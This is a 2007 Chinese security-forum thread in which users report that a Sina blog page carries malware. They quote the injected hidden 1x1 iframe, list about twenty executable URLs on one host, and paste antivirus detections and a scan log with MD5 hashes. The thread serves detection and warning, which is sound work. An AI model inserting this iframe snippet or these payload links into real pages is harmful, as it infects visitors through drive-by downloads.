新浪网挂毒了?

显示全部楼层 · 发表于 2007-10-18 21:09:22

hxxp://blog.sina.com.cn/s/blog_4e7ffffc01000a9u.html

显示全部楼层 · 发表于 2007-10-18 21:12:50

新浪Blog已经有人报告过这一问题。

显示全部楼层 · 发表于 2007-10-18 21:18:12

<IFRAME STYLE="WIDTH: 10px; HEIGHT: 1px" BORDER="0" ALIGN="center" MARGINWIDTH="0" MARGINHEIGHT="0" SRC="http://60.190.222.235/mian18.htm" WIDTH="1" HEIGHT="1"></IFRAME>

今天刚看过这个http://60.190.222.235/window.exe

另加一堆：
http://60.190.222.235/win1.exe
http://60.190.222.235/win2.exe
http://60.190.222.235/win3.exe
http://60.190.222.235/win4.exe
http://60.190.222.235/win5.exe
http://60.190.222.235/win6.exe
http://60.190.222.235/win7.exe
http://60.190.222.235/win8.exe
http://60.190.222.235/win9.exe
http://60.190.222.235/win10.exe
http://60.190.222.235/win11.exe
http://60.190.222.235/win12.exe
http://60.190.222.235/win13.exe
http://60.190.222.235/win14.exe
http://60.190.222.235/win15.exe
http://60.190.222.235/win16.exe
http://60.190.222.235/win17.exe
http://60.190.222.235/win18.exe
http://60.190.222.235/win19.exe
http://60.190.222.235/win20.exe

显示全部楼层 · 发表于 2007-10-18 23:01:39

antivir报了2个网页，但是windows。exe的那个病毒被下载了。。

显示全部楼层 · 发表于 2007-10-19 08:47:26

其实这是新浪博客，是个人的博客
有病毒，也不足为奇

显示全部楼层 · 发表于 2007-10-19 10:07:28

原帖由 mofunzone 于 2007-10-18 23:01 发表
antivir报了2个网页，但是windows。exe的那个病毒被下载了。。

那个不是WINDWS。CAB么。
另外，运行的话，红伞启发报了。
生成物红伞启发报了。

Virus or unwanted program 'HEUR/Malware [HEUR/Malware]'
detected in file 'C:\WINDOWS\ctfmon.exe.
Action performed: Deny access

显示全部楼层 · 发表于 2007-10-19 10:12:02

NOD32有反应！
htp://60.190.222.235/ww/nick.js JS/TrojanDownloader.Psyme.NCK 木马
htp://60.190.222.235/window.cab Win32/Jalous.B 蠕虫

[ 本帖最后由 BING126 于 2007-10-19 10:13 编辑 ]

显示全部楼层 · 发表于 2007-10-19 10:41:24

其实这是新浪博客，是个人的博客
有病毒，也不足为奇

不是吧!! 是不是模版, 那种地方,没过滤哦!

显示全部楼层 · 发表于 2007-10-19 17:08:05

MicroVita AntiSpyware 100 C
_____________________________________________

         风暴微塔反间谍
[强力查杀各种Win32位的病毒,木马,蠕虫,恶意软件]
               http://221.10.254.214/
----------------------------------------------
开始扫描……

正在检查启动……
[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win2.exe]
                  …………发现Spy！报告:[2] [8] HOOK者
文件信息:  大小:26112  MD5:37f12b4e6b652b19a7670ff56e9a8a9d

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win1.exe.VIRUS]
                  …………发现Spy！报告:[1]
文件信息:  大小:41673  MD5:dbec5a42ee5b1ff270086cac20226979

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win4.exe.VIRUS]
                  …………发现Spy！报告:[1]
文件信息:  大小:15156  MD5:c8d0afa0ad2035ccc4b9124cc8b96c3b

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win16.exe]
                  …………发现Spy！报告:[2]
文件信息:  大小:51505  MD5:5b4e0d870e09aa111671ec8e472c0f9d

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win17.exe]
                  …………发现Spy！报告:[1]
文件信息:  大小:14192  MD5:6c413772e9870e55c7b22586e4426a3e

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win18.exe.VIRUS]
                  …………发现Spy！报告:[1]
文件信息:  大小:12072  MD5:825d98481d9e81a1df6ca41784c871db

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win19.exe.VIRUS]
                  …………发现Spy！报告:[1]
文件信息:  大小:26209  MD5:a7c09e579c5635120f148afcbc3be21b

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win20.exe.VIRUS]
                  …………发现Spy！报告:[1]
文件信息:  大小:177493  MD5:8fa9e2057bb42cdd6fd40d91de484511

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\window.exe.VIRUS]
                  …………发现Spy！报告:[1]
文件信息:  大小:17776  MD5:f2855033addd2d4605f9eb251997a456

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win14.exe.VIRUS]
                  …………发现Spy！报告:[1]
文件信息:  大小:15008  MD5:1649f60542ee922e9bef58422068e9e5

[C:\Documents and Settings\Administrator\桌面\Virus\新建文件夹 (2)\win13.exe.VIRUS]
                  …………发现Spy！报告:[1]
文件信息:  大小:16336  MD5:5521b1477463110895d7642132584df8

文件数:19 病毒数:11  比重:0.5789473684211
OK  扫描完毕！

  ***日志解释
[4] 集中有害分析引擎
[3] 全局系统判断引擎
[2] 文件特征码引擎
[1] 文件启发式引擎

显示全部楼层 · 发表于 2007-10-19 17:34:02

nod32报了

2007-10-19 17:31:58 IMON 文件 http://60.190.222.235/ww/nick.js JS/TrojanDownloader.Psyme.NCK 木马连接中断

[已鉴定] 新浪网挂毒了?